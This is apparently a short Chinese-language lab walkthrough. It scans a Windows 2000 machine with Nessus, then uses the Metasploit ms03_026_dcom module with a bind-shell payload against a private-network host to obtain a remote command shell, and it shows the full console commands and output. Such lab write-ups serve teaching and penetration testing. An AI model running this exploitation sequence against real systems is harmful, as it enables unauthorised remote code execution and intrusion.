1.利用Nessus扫描该windows 2000的机器,发现有些高危的漏洞
比如:MS03-026 / MS03-039: Buffer Overrun In RPCSS Service Could Allow Code Execution (823980 / 824146)
然后打开msfconsole
msf > search ms03-026
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great No MS03-026 Microsoft RPC DCOM Interface Overflow
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(windows/dcerpc/ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 135 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(windows/dcerpc/ms03_026_dcom) > show payloads
msf exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 10.26.33.111
RHOST => 10.26.33.111
msf exploit(windows/dcerpc/ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.26.33.111 yes The target address
RPORT 135 yes The target port (TCP)
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 10.26.33.111 no The target address
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(windows/dcerpc/ms03_026_dcom) > run
[*] 10.26.33.111:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 10.26.33.111:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.26.33.111[135] ...
[*] 10.26.33.111:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.26.33.111[135] ...
[*] 10.26.33.111:135 - Sending exploit ...
[*] Started bind TCP handler against 10.26.33.111:4444
[*] Command shell session 1 opened (10.26.30.41:36675 -> 10.26.33.111:4444) at 2018-12-11 19:33:33 +0800
C:\WINNT\system32>d:
d:
D:\>dir
dir
ZRMPSEL_CN
EAB5-D65E
D:\ ¼
2003-06-26 20:00 45 AUTORUN.INF
2003-06-26 20:00 <DIR> BOOTDISK
2003-06-26 20:00 304,624 BOOTFONT.BIN
2003-06-26 20:00 0 CDROMSP4.TST
2003-06-26 20:00 5 CDROM_IP.5
2003-06-26 20:00 5 CDROM_NT.5
2003-06-26 20:00 <DIR> DISCOVER
2003-06-26 20:00 <DIR> I386
2003-06-26 20:00 12,354 READ1ST.TXT
2003-06-26 20:00 465,408 README.DOC
2003-06-26 20:00 358,160 SETUP.EXE
2003-06-26 20:00 <DIR> SETUPTXT
2003-06-26 20:00 18,173 SPNOTES.HTM
2003-06-26 20:00 <DIR> SUPPORT
2003-06-26 20:00 <DIR> VALUEADD
9 1,158,774
6 ¼ 0